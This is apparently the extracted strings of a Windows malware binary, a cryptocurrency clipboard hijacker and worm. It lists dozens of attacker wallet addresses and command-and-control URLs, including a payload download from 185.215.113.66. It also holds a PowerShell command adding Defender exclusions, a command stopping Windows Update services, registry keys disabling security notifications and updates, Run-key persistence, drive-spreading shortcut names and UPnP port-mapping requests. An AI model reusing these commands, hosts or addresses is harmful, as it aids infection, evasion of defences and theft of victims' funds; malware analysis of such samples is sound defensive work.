!This program cannot be run in DOS mode.
m+qj)J 9)J 9)J 9 2
9.J 9Q8
EB9+J 9
E@9(J 9
r9-J 9)J
d9<J 9 2
9-J 9 2
95J 9 2
9(J 9Rich)J 9
`.rdata
@.data
>ilciuo
L$$QRP
;PCOIu^
>ilciu
F(;F$s
>ilciu2
uZhL#A
tHhX&A
umh@$A
VC20XC00U
;t$(v(
UQPXY]Y[
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
mona1qwdqvzuwn6qj7l9xmsfqur2vc7uda0rcpftv9ej
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
QaBvbNAuoU52qCgbqsgoLAbK5P21L6dn5Y
RLefLLmDAZZb5ZynfPMjZ475pQdHVZNz9J
NASUHUTM7J5HNOJVZ2EULOP6INPNPSE4KN6AQNRI
Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn
via1qs8zt7jr4sgru6r8dqtdpc93c5d8wmwu8rkz94z
Wdv4zK4Fc9D2PJ9aePL9jUmdjvdQeoKV7Q
uhdnHQRJEBxePpLi6YhiS6Kxgct6vG7Q9f
grs1qscr354fdfddglta2hgajrcryl4gqh6ey360d3u
PCsLUHxdx4nFpp5RSYZ6YyJztgYRcErmQk
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
n1HHGP3YmZp3YA7VgqVgfJqyKBV86d9SaJo
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
8BXeKLC4rvUixuusetP2ZhYZicVqnU8FQV9mk5B9ZPsiYswxqrxqwnr4Tc3BhpvHz88jgY6qyXmqcZiTruLF3NKrEqmWdTj
SP1GK1GES8EXB6E15KQJ0EM169NQQNDZG8A2GDRZQ
SdRJvZ4LHuGxfsrnRuBcBYzxcQAyKU2MX6
aPFoyg69vKYCfnKGo1eLBo5XAmoyuZniGc
f1sz5wwh6urr3gsycgkki7ns5iino3a7bu3chsgly
f53ea9bd3352fd3b24be04fa27ce2171b21d1378e658c50553d804cfa70ceb64
dgb1qnyphwne0t26mmxh2amyzzxzerxarj6jmf8wpmr
dn1q3yrdfjppj9pqxqha4k4a690cd9a3mjkd8jku7m
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3
zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v
cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf
erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx
kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn
inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9
osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3
one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3BiS1jaRpWtkqtfZGp9f1rXXts5DyUkaBX
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5
thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur
tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0
sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz
sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy
ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr
addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg
nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb
G35598989
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV
E36963824
EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM
B36461211
B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA
BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH
U33390790
UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb
http://185.215.113.66/
http://91.202.233.141/
CheckedValue
DisableWindowsUpdateAccess
DisableWindowsUpdateAccess
NoAutoUpdate
NoAutoUpdate
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
www.update.microsoft.com
0.0.0.0
TCP: P2P_SendGETLPacket(0,%s) failed!
HTTP/1.1 200 OK
LOCATION:
239.255.255.250
M-SEARCH * HTTP/1.1
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
Man:"ssdp:discover"
HOST: 239.255.255.250:1900
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Content-Type: text/xml; charset="utf-8"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"/></SOAP-ENV:Body></SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:DeletePortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost>%s</NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
</m:DeletePortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
WS2_32.dll
StrStrW
StrCmpNW
PathMatchSpecW
PathFileExistsW
StrChrA
PathFindFileNameW
StrStrIA
StrCmpNIA
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
DeleteUrlCacheEntry
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetOpenA
InternetCrackUrlA
HttpAddRequestHeadersA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
memcpy
strlen
memset
iswdigit
iswalpha
_chkstk
_aulldiv
wcslen
wcscmp
_allshl
_aullshr
strstr
strcmp
memmove
memcmp
RtlTimeToSecondsSince1980
NtQuerySystemTime
mbstowcs
ntdll.dll
RtlUnwind
NtQueryVirtualMemory
_vscprintf
msvcrt.dll
GlobalUnlock
GlobalLock
GlobalAlloc
lstrlenA
lstrlenW
lstrcpynW
MultiByteToWideChar
ExitThread
GetTickCount
GetModuleHandleW
CloseHandle
UnmapViewOfFile
GetFileSize
MapViewOfFile
CreateFileMappingW
CreateFileW
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
FlushFileBuffers
WriteFile
lstrcpyW
QueryDosDeviceW
GetDriveTypeW
GetLogicalDrives
DeleteFileW
ExpandEnvironmentStringsW
RemoveDirectoryW
FindClose
FindNextFileW
MoveFileExW
lstrcmpW
FindFirstFileW
CreateDirectoryW
lstrcmpiW
CopyFileW
SetFileAttributesW
GetDiskFreeSpaceExW
GetVolumeInformationW
GetModuleFileNameW
CreateThread
CreateEventA
ExitProcess
GetLastError
CreateMutexA
HeapAlloc
GetCurrentProcessId
HeapSetInformation
HeapCreate
GetProcessHeaps
HeapReAlloc
HeapValidate
HeapFree
InterlockedExchange
InterlockedDecrement
WaitForSingleObject
InterlockedIncrement
InterlockedExchangeAdd
IsBadReadPtr
DuplicateHandle
GetCurrentProcess
SetThreadPriority
GetThreadPriority
GetCurrentThread
DeleteCriticalSection
GetLocaleInfoA
CreateProcessW
KERNEL32.dll
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DispatchMessageA
TranslateMessage
GetMessageA
CreateWindowExW
RegisterClassExW
wsprintfW
DefWindowProcA
ChangeClipboardChain
RegisterRawInputDevices
GetClipboardData
IsClipboardFormatAvailable
SendMessageA
SetWindowLongW
SetClipboardViewer
GetWindowLongW
wsprintfA
wvsprintfA
USER32.dll
RegCloseKey
RegQueryValueExW
RegOpenKeyExW
RegOpenKeyExA
RegCreateKeyExW
RegSetValueExA
RegSetValueExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CoInitializeEx
ole32.dll
OLEAUT32.dll
WSAWaitForMultipleEvents
WSASocketA
WSACreateEvent
WSAGetOverlappedResult
WSAEventSelect
WSAEnumNetworkEvents
WSASend
WSARecv
WSACloseEvent
SetEvent
GetQueuedCompletionStatus
PostQueuedCompletionStatus
GetSystemInfo
CreateIoCompletionPort
Sep 21 2024 13:10:04
Sep 21 2024 13:10:04
0123456789
0123456789abcdef
0t6rv5xwbh
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
399257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
399257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
0123456789abcdef
\.Ct_;
jjjjjj
bitcoincash:
cosmos
bitcoincash:
ronin:
yronin:
bitcoincash:
cosmos
gnano_
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
%temp%
%s\%d%d.exe
%comspec%
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
http://185.215.113.66/tdrp.exe
%s:Zone.Identifier
/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe
/c start %s & start %s\rvlcfg.exe
%s.lnk
%s\%s\rvlcfg.exe
%s\%s\rvldrv.exe
shell32.dll
shell32.dll
shell32.dll
shell32.dll
Thumbs.db
$RECYCLE.BIN
desktop.ini
System Volume Information
%s\%s\%s
(%dGB)
Unnamed volume
Microsoft Corporation
%s:Zone.Identifier
%userprofile%
%windir%
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%temp%
Software\Microsoft\Windows\CurrentVersion\Run\
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmd.exe
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmd.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
SYSTEM\CurrentControlSet\Services\UsoSvc
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc
SYSTEM\CurrentControlSet\Services\wuauserv
SYSTEM\CurrentControlSet\Services\DoSvc
SYSTEM\CurrentControlSet\Services\BITS
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
%s\tbtnds.dat
%s\tbtcmds.dat
service
serviceType
serviceList
device
deviceType
deviceList
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
controlURL
URLBase
GetExternalIPAddressResponse
NewExternalIPAddress
6%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
sysklnorbcv.exe
Windows Settings